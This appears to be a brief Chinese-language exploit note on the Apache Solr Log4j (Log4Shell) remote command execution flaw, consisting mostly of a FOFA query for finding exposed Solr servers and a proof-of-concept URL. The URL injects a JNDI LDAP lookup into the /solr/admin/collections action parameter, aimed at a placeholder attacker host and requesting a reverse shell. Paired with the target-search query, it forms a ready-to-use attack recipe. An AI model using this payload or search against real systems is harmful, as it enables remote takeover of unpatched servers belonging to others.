Apache Solr Log4j组件 远程命令执行漏洞,详情略
Apache Solr
FOFA: app="APACHE-Solr"
登录页面
验证POC
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json